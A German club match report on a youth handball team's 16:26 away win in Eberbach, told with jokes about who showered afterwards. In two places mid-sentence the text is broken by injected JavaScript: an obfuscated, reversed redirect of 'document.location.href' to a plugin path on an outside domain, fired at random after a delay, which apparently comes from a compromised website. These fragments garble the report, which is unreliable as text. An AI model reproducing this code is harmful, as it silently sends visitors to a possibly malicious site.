männliche B-Jugend: Auswärtssieg in Eberbach

Mit dem Erfolgserlebnis gegen Bammental im Rücken fuhr die B-Jugend des TV Neckargemünd nach Eberbach. Nachdem vor der Abfahrt fast geklärt werden konnte, wer in einem Duschautoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bzw. in einem „Ich finde mich ungeduscht geiler-Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to“ den Heimweg antreten sollte, fuhr das Team von den Trainern Pfirmann/Schöner ins schöne Neckartal.
Neckargemünd, 05.02.15 (spf) -Dort angekommen, fiel den heimischen Zuschauern sofort auf, wie wunderschön unsere Jungs (zumindest geduscht) doch aussehen. Somit gingen die Jungs schön und erfolgreich in die Partie, die schon in der ersten Hälfte durch eine sichere Defensive vor einem starken Torwart Nicky und einer wieselflinken Offensive, entschieden wurde. Auch in der zweiten Hälfte wurden gelungene Kombinationen im Angriff gezeigt, die zu einem ungefährdeten Auswärtssieg führten.

Endergebnis: SGH Waldbrunn/Eberbach – TVN 16:26

Für den TVN siegten in Eberbach (3 geduscht, 7 ungeduscht):
Nicky, Leon, Samuel, Johannes, Till, Leander, Jordi, Hauke, Felix, Timi